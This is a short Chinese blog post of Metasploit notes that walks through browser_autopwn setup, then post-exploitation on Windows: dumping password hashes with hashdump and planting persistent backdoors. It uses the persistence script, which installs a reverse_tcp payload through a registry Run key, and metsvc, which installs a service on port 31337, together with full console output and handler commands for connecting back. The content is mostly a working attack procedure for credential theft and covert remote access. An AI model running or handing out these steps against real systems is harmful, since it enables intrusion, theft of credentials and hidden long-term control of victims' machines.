zoukankan      html  css  js  c++  java
  • search autopwn

    search autopwn

     
    use server/browser_autopwn
     
    show options
     
    set LHOST 
     
    set SRVPORT
     
    set URIPATH /
     
    show options
     
    修改 etter.conf 文件
    if you use ipchains
    if you use iptables
     
     
     
     
     
     
     
    得到sessions后
     
    run hashdump
     
    run persistence -X -i 5 -p 445 -r 192.168.1.106
     
     
    Metasploit之建立backdoor一二
     
    1.meterpreter自带脚本 
     
    方法1.run presistence 
     
    可以使用run presistence -h查看选项: 
     
    meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.139 
    [*] Running Persistance Script 
    [*] Resource file for cleanup created at 
    /root/.msf4/logs/persistence/WIN03SP0_20130122.2044/WIN03SP0_20130122.2044.rc 
    [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.139 
     
    LPORT=443 
    [*] Persistent agent script is 609496 bytes long 
    [+] Persistent Script written to C:WINDOWSTEMPzvlYoXnVYFbR.vbs 
    [*] Executing script C:WINDOWSTEMPzvlYoXnVYFbR.vbs 
    [+] Agent executed with PID 3272 
    [*] Installing into autorun as HKCUSoftwareMicrosoftWindows 
    CurrentVersionRunFCBCUBtLrzFY 
    [+] Installed into autorun as HKCUSoftwareMicrosoftWindows 
     
    CurrentVersionRunFCBCUBtLrzFY
    可以看到添加启动是通过,添加注册表键值,启动的是vbs脚本的后门。 
     
    连接: 
     
    msf > use exploit/multi/handler 
    msf  exploit(handler) > set payload windows/metsvc_bind_tcp 
    payload => windows/metsvc_bind_tcp 
    msf  exploit(handler) > set LHOST 192.168.1.139 
    LHOST => 192.168.1.139 
    msf  exploit(handler) > set LPORT 443 
    LPORT => 443 
    msf  exploit(handler) > exploit 
     
    [*] Started bind handler 
    [*] Starting the payload handler...
    默认没启动,目标机重启后,可以成功获得meterpreter shell 
     
    方法2.run metsvc 
     
    执行metsvc 脚本 
     
    meterpreter > run metsvc -A 
    [*] Creating a meterpreter service on port 31337 
    [*] Creating a temporary installation directory C:WINDOWSTEMP 
     
    kqaqtcsWhBTbO... 
    [*]  >> Uploading metsrv.dll... 
    [*]  >> Uploading metsvc-server.exe... 
    [*]  >> Uploading metsvc.exe... 
    [*] Starting the service... 
       * Installing service metsvc 
    * Starting service 
    Service metsvc successfully installed. 
     
    [*] Trying to connect to the Meterpreter service at 192.168.1.108:31337...
    新建的服务,加自启动(映像名称metsvc.exe,服务metsvc ),连接到后门: 
     
    msf > use exploit/multi/handler 
    msf  exploit(handler) > set payload windows/metsvc_bind_tcp 
    payload => windows/metsvc_bind_tcp 
    msf  exploit(handler) > set LPORT 31337 
    LPORT => 31337 
    msf  exploit(handler) > set RHOST 192.168.1.108 
    RHOST => 192.168.1.108 
    msf  exploit(handler) > exploit 
     
    [*] Started bind handler 
    [*] Starting the payload handler... 
     
    meterpreter >
    成功连接 
  • 相关阅读:
    bzoj 1086 [SCOI2005]王室联邦——思路
    bzoj 3809 Gty的二逼妹子序列——莫队+分块
    bzoj 3781 小B的询问——分块
    bzoj 3309 DZY Loves Math——反演+线性筛
    洛谷 1079 Vigenère 密码——模拟水题
    洛谷 1082 同余方程——exgcd(水题)
    bzoj2662 [BeiJing wc2012]冻结 ——分层图
    bzoj2242 [SDOI2011]计算器——BSGS
    bzoj1008 [HNOI2008]越狱——快速幂
    bzoj1607 [Usaco2008 Dec]Patting Heads 轻拍牛头——暴力
  • 原文地址:https://www.cnblogs.com/journeyIT/p/8259946.html
Copyright © 2011-2022 走看看